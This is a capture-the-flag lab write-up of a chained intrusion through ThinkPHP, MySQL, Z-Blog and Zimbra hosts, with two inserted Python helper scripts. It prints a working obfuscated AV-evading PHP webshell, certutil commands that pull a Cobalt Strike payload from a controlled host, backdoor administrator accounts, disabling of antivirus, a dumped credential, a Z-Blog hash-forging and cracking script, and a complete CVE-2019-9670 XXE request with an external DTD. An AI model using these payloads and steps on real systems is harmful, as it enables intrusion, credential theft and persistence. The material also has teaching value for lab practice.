cyberstrikelab-Thunder

Information gathering

./fscan_mac_arm64 -h 172.20.56.10/24

fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.20.56.32 is alive
(icmp) Target 172.20.56.233 is alive
[*] Icmp alive hosts len is: 2
172.20.56.32:3306 open
172.20.56.32:445 open
172.20.56.32:139 open
172.20.56.32:80 open
172.20.56.233:8080 open
172.20.56.233:22 open
172.20.56.32:135 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo
[*]172.20.56.32
[->]WIN-BCQDCARVJPJ
[->]172.20.56.32
[->]172.20.57.30
[*] WebTitle https://172.20.56.233:8080 code:404 len:19 title:None
[*] WebTitle http://172.20.56.32 code:200 len:931 title:None
[+] PocScan http://172.20.56.32 poc-yaml-thinkphp5-controller-rce
已完成 6/7 [-] ssh 172.20.56.233:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 172.20.56.233:22 root a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 172.20.56.233:22 admin 123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 172.20.56.233:22 admin 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 172.20.56.233:22 admin Aa123456! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/7
[*]扫描结束,耗时: 5m42.5521965s

The scan turns up a ThinkPHP vulnerability: fscan's poc-yaml-thinkphp5-controller-rce check hits on http://172.20.56.32.

ThinkPHP RCE

Got the first flag.

Originally I wanted to drop a webshell straight away, but a look at the process list (tasklist) first showed what was running on the box:

System Idle Process 0 Services 0 4 K
System 4 Services 0 140 K
smss.exe 296 Services 0 1,200 K
csrss.exe 388 Services 0 4,412 K
wininit.exe 456 Services 0 5,124 K
csrss.exe 464 Console 1 8,276 K
winlogon.exe 508 Console 1 10,416 K
services.exe 572 Services 0 8,936 K
lsass.exe 580 Services 0 13,008 K
svchost.exe 656 Services 0 19,224 K
svchost.exe 692 Services 0 8,720 K
dwm.exe 788 Console 1 38,232 K
svchost.exe 840 Services 0 45,240 K
svchost.exe 860 Services 0 20,984 K
svchost.exe 888 Services 0 23,564 K
svchost.exe 916 Services 0 15,940 K
svchost.exe 96 Services 0 17,488 K
svchost.exe 712 Services 0 7,004 K
svchost.exe 740 Services 0 17,604 K
360rps.exe 356 Services 0 6,764 K
ZhuDongFangYu.exe 1028 Services 0 27,064 K
svchost.exe 1384 Services 0 16,716 K
svchost.exe 1528 Services 0 6,508 K
spoolsv.exe 1616 Services 0 16,252 K
svchost.exe 1768 Services 0 22,396 K
httpd.exe 1812 Services 0 15,276 K
MsMpEng.exe 1820 Services 0 185,872 K
svchost.exe 1924 Services 0 7,880 K
mysqld.exe 1972 Services 0 24,052 K
httpd.exe 2504 Services 0 31,988 K
ChsIME.exe 2556 Console 1 15,660 K
RuntimeBroker.exe 3420 Console 1 14,664 K
sihost.exe 3500 Console 1 18,808 K
svchost.exe 3512 Console 1 20,368 K
taskhostw.exe 3528 Console 1 15,496 K
ChsIME.exe 3720 Console 1 15,784 K
explorer.exe 3824 Console 1 71,808 K
ShellExperienceHost.exe 2200 Console 1 45,532 K
SearchUI.exe 2948 Console 1 44,312 K
ServerManager.exe 4456 Console 1 70,136 K
360sd.exe 4840 Console 1 1,932 K
360rp.exe 4964 Console 1 44,636 K
360Tray.exe 5020 Console 1 63,472 K
360speedld.exe 4684 Console 1 42,084 K
svchost.exe 3600 Services 0 7,128 K
WmiPrvSE.exe 2028 Services 0 7,812 K
MpCmdRun.exe 708 Services 0 2,200 K
conhost.exe 1356 Services 0 1,392 K
MpCmdRun.exe 1956 Services 0 11,016 K
cmd.exe 5320 Services 0 3,636 K
conhost.exe 4516 Services 0 9,428 K
tasklist.exe 2708 Services 0 7,764 K
WmiPrvSE.exe 4564 Services 0 8,884 K

360 antivirus is present (360rps.exe, ZhuDongFangYu.exe, 360Tray.exe and friends), and Windows Defender is running as well (MsMpEng.exe, MpCmdRun.exe), so the webshell has to evade AV. The one below is adapted from another researcher's webshell: the function names are never written in plaintext, they are rebuilt at runtime by a character-substitution helper, and the shell probes disable_functions to pick a primitive that is still allowed.

<?php
// Obfuscation helper m(): str_replace with arrays applies the character pairs
// one after another, so the "garbage" words below decode to the real names.
function m($a, $b, $c) {
return str_replace(str_split($a), str_split($b), $c);
}

// $S holds the execution primitives the shell will try, decoded at runtime:
$S = array(
m("ncoai", "msyte", "cocain"),                                   // "system"
m("sir", "cex", "iris"),                                         // "exec"
m("otab", "lshe", "taboo") . "_" . m("sir", "cex", "iris"),      // "shell_exec"
m("gbledin", "upasthr", "bleeding")                              // "passthru"
);

// Read the PHP setting that lists blocked functions: ini_get("disable_functions")
$TR = m("etroubl", "edisabl", "trouble");        // "disable"
$MK = m("dpreambl", "sfunctio", "preambled");    // "functions"
$D = explode(",", ini_get($TR . '_' . $MK));     // no trim(): "a, b" leaves " b" unmatched

// Operator input arrives in the "lol" parameter (GET, POST or cookie)
$P = $_REQUEST;

foreach ($S as $A) {
// Use the first candidate that is not listed in disable_functions
if (!in_array($A, $D)) {
if ($A == m("ncoai", "msyte", "cocain")) {
// "system" allowed: evaluate the supplied PHP code
if (isset($P['lol'])) {
eval($P['lol']);
}
} elseif ($A == m("sir", "cex", "iris")) {
// "exec" allowed: run an OS command and return its output (stderr included)
exec($P['lol'] . " 2>&1", $arr);
echo join("\n", $arr) . "\n";
} else {
// shell_exec / passthru allowed: fall back to eval as well
if (isset($P['lol'])) {
eval($P['lol']);
}
}
// Only one branch ever runs per request
exit;
}
}
?>
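To see what the webshell actually resolves to without running it, the following added example (my own code, not from the writeup or the webshell's author) emulates PHP's sequential array str_replace in Python, recovers every hidden name, and replays the foreach selection against a given disable_functions value. The disable_functions strings passed in are constructed for the demonstration.

```python
"""Added example: decode the m() obfuscation of the PHP webshell above and
replay its branch selection. Not part of the original writeup."""

from typing import Optional, Tuple


def php_str_replace_chars(search: str, replace: str, subject: str) -> str:
    """Emulate str_replace(str_split($search), str_split($replace), $subject).

    PHP applies the pairs one at a time over the whole string, so a later
    pair can rewrite characters an earlier pair just produced. The author
    chose the pairs so the chain still lands on the intended word.
    """
    if len(search) != len(replace):
        raise ValueError("search and replace strings must be the same length")
    for s, r in zip(search, replace):
        subject = subject.replace(s, r)
    return subject


# The exact m() calls made by the webshell, in source order.
OBFUSCATED_CALLS = [
    ("ncoai", "msyte", "cocain"),
    ("sir", "cex", "iris"),
    ("otab", "lshe", "taboo"),
    ("gbledin", "upasthr", "bleeding"),
    ("etroubl", "edisabl", "trouble"),
    ("dpreambl", "sfunctio", "preambled"),
]


def recover_names() -> dict:
    """Map each obfuscated subject word to the plaintext it decodes to."""
    return {subject: php_str_replace_chars(a, b, subject)
            for a, b, subject in OBFUSCATED_CALLS}


def candidate_functions() -> list:
    """Rebuild the $S array: the execution primitives the shell probes for."""
    names = recover_names()
    return [names["cocain"], names["iris"],
            names["taboo"] + "_" + names["iris"], names["bleeding"]]


def select_branch(disable_functions: str) -> Optional[Tuple[str, str]]:
    """Replay the foreach loop: the first candidate absent from disable_functions wins.

    Mirrors the PHP exactly: explode(',') with no trim(), so a value such as
    'system, exec' (note the space) does NOT block exec, because ' exec' != 'exec'.
    Returns (function name, action) or None when every candidate is disabled.
    """
    disabled = disable_functions.split(",")
    for fn in candidate_functions():
        if fn in disabled:
            continue
        if fn == "system":
            return fn, "eval"      # first branch: eval($P['lol'])
        if fn == "exec":
            return fn, "exec"      # second branch: exec($P['lol'] . ' 2>&1')
        return fn, "eval"          # default branch: eval($P['lol'])
    return None


if __name__ == "__main__":
    print(recover_names())
    print(candidate_functions())
    # Constructed disable_functions value for the demonstration
    print(select_branch("system,shell_exec"))
```

The ini_get lookup is the only runtime dependency the shell has; the rest is static, which is why a scanner that evaluates the m() calls (or simply greps for `str_split` paired with `eval($_REQUEST`) catches it regardless of which garbage words are used.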

Next, send a shell back to Cobalt Strike to try privilege escalation. Because 360 is present, the CS payload also needs AV evasion, so I used this project:
https://github.com/T4y1oR/RingQ

Potato privilege escalation

Privilege escalation succeeded.

Persistence

First add a backdoor user for myself, RDP in, and turn 360 off.

shell net user ocean admin@123 /add
shell net localgroup administrators ocean /add

Then enable the RDP service with a CS plugin.

Kill 360 outright, then dump credentials:

Administrator / Tp@cslKM

Internal network penetration

The host has two NICs (172.20.56.32 and 172.20.57.30, as fscan's NetInfo showed), so gather information on the second segment, again with fscan:


fscan version: 1.8.4
start infoscan
(icmp) Target 172.20.57.30 is alive
(icmp) Target 172.20.57.98 is alive
[*] Icmp alive hosts len is: 2
172.20.57.30:445 open
172.20.57.98:3306 open
172.20.57.30:3306 open
172.20.57.98:445 open
172.20.57.98:139 open
172.20.57.30:139 open
172.20.57.98:135 open
172.20.57.30:135 open
172.20.57.30:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo
[*]172.20.57.30
[->]WIN-BCQDCARVJPJ
[->]172.20.56.32
[->]172.20.57.30
[*] NetInfo
[*]172.20.57.98
[->]WIN-J2B9EIUKEN3
[->]172.20.57.98
[->]10.0.0.65
[*] NetBios 172.20.57.98 WORKGROUP\WIN-J2B9EIUKEN3 Windows Server 2016 Standard 14393
[*] WebTitle http://172.20.57.30 code:200 len:931 title:None

[03/27 16:39:36] [+] received output:
[+] PocScan http://172.20.57.30 poc-yaml-thinkphp5-controller-rce

This reveals a new IP, 10.0.0.65, and another host, 172.20.57.98. A full-port scan of 172.20.57.98 found nothing more: as in the first scan there is no web service, only SMB and MySQL, so the database is the way in. Following an earlier writeup, the lab hints that CSLab is used as both the username and the password.

Remember to route the brute-force through the proxy; then connect with MDUT.

Lateral movement: 172.20.57.98

Privilege escalation through a MySQL UDF. Defender is running here too, so rather than fight it I used the UDF command execution to launch the CS beacon before it gets caught. I placed the evasion-wrapped payload in the ThinkPHP service's public directory on the first host so it can be fetched over HTTP:

certutil -urlcache -split -f http://172.20.57.30/RingQ.exe
certutil -urlcache -split -f http://172.20.57.30/main.txt

Upload succeeded; now execute it.

The beacon came back through the pivot. Try Potato privilege escalation again.

Success. Set up persistence again, RDP in, and turn Defender off.

shell net user ocean admin@123 /add
shell net localgroup administrators ocean /add

Keep scanning the internal network with fscan, this time from the 10.0.0.0 side:

fscan version: 1.8.4
start infoscan
(icmp) Target 10.0.0.34 is alive
(icmp) Target 10.0.0.65 is alive
[*] Icmp alive hosts len is: 2
10.0.0.34:80 open
10.0.0.34:22 open
10.0.0.65:3306 open
10.0.0.65:445 open
10.0.0.65:139 open
10.0.0.65:135 open
[*] alive ports len is: 6
start vulscan
[*] NetInfo
[*]10.0.0.65
[->]WIN-J2B9EIUKEN3
[->]172.20.57.98
[->]10.0.0.65

10.0.0.34 has a web service; set up a proxy and take a look. It is Z-Blog, which calls for source review; here I followed another researcher's approach.

Lateral movement: 10.0.0.34

On the database host we took earlier, the Z-Blog member table exposes the user's guid.

The password-hashing algorithm is in the Z-Blog source: the stored value is md5 of (md5 of the plaintext, concatenated with the guid).

So we generate the hash ourselves and write it into the database:

ps = 123456
guid = 24d876c8772572cf839674c5a176e41c
Password = md5(md5(ps) + guid)
Password = 30492f76a0fbcf3906cce8b4b566d6b6
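The derivation above, as an added Python example that is not part of the original writeup: it reproduces md5(md5(password) . guid) for the guid read from the database, and also runs the reverse direction, testing a list of candidate passwords against a stored hash offline. The guid is the writeup's; the wordlist is constructed for the demonstration.

```python
"""Added example: Z-Blog password derivation and offline candidate testing.
Not part of the original writeup."""

import hashlib
from typing import Iterable, Optional

# guid read from the compromised database host (value from the writeup)
GUID = "24d876c8772572cf839674c5a176e41c"


def md5_hex(data: str) -> str:
    """Lowercase hex md5 of a UTF-8 string, matching PHP's md5()."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def zblog_password_hash(password: str, guid: str) -> str:
    """Z-Blog stores md5( md5(plaintext) . guid ); both digests are lowercase hex.

    The guid acts as a per-user salt: the same password hashes differently for
    every member row, so a plain md5 lookup table will not match. It is still a
    fast unsalted-style hash, so any guessable password falls quickly once the
    guid is known, which is exactly the situation after the database dump.
    """
    return md5_hex(md5_hex(password) + guid)


def crack(stored_hash: str, guid: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose derived hash equals stored_hash, else None."""
    target = stored_hash.strip().lower()
    for pw in candidates:
        if zblog_password_hash(pw, guid) == target:
            return pw
    return None


# Constructed wordlist for the demonstration; a real run would stream a file.
WORDLIST = ["password", "admin", "CSLab", "123456", "admin@123"]


if __name__ == "__main__":
    h = zblog_password_hash("123456", GUID)
    print("hash for 123456 with the dumped guid:", h)   # compare with the value above
    print("recovered from wordlist:", crack(h, GUID, WORDLIST))
```

Writing the generated hash into the member row is the quickest path here because we already have write access to the database; crack() is the option when you only have read access and want the original password for reuse elsewhere.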

That gets us into the admin backend, which has a file upload; see
https://github.com/fengyijiu520/Z-Blog-

Then connect with AntSword. The box is Linux, so we need to escalate; start with sudo -l.

sudo -l shows a writable .sh script allowed via sudo, so edit that script and run it through sudo.

Check the host's IP addresses again.

There is yet another network layer (10.1.1.0/24). Keep scanning inward and extend the proxy chain at the same time.

10.1.1.56:11211 open
10.1.1.56:443 open
10.1.1.78:80 open
10.1.1.78:22 open
10.1.1.56:22 open
10.1.1.56:7071 open
10.1.1.56:8443 open
[+] Memcached 10.1.1.56:11211 unauthorized
[*] WebTitle http://10.1.1.78 code:200 len:7205 title:Good Luck To You! - cyberstrikelab

Take a look at the discovered services. Note the unauthenticated Memcached on 10.1.1.56:11211 as well; it was not needed here but is worth remembering.

10.1.1.56 runs Zimbra (443, 7071 and 8443 are the mail and admin web interfaces), so look for Zimbra vulnerabilities.

Lateral movement: 10.1.1.56

There is CVE-2019-9670, an XXE in Zimbra's Autodiscover servlet.

Reference: http://nooemotion.com/2023/02/16/zimbra%E6%94%BB%E9%98%B2%E7%AC%94%E8%AE%B0-xxessrf-rce/

First write an external DTD. This one reads localconfig.xml, which holds the Zimbra account credentials; change the file path to read the flag directly. The CDATA wrapper keeps the XML markup inside the leaked file from breaking the parse.

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">  
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

Remember to host the DTD on the PHP server we already control (10.1.1.78), since Zimbra must be able to fetch it, then send the request:

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 10.1.1.56:8443
Cookie: ZM_TEST=true
Content-Length: 399
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Origin: https://10.1.1.56
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://10.1.1.56/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: keep-alive

<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://10.1.1.78/test.dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>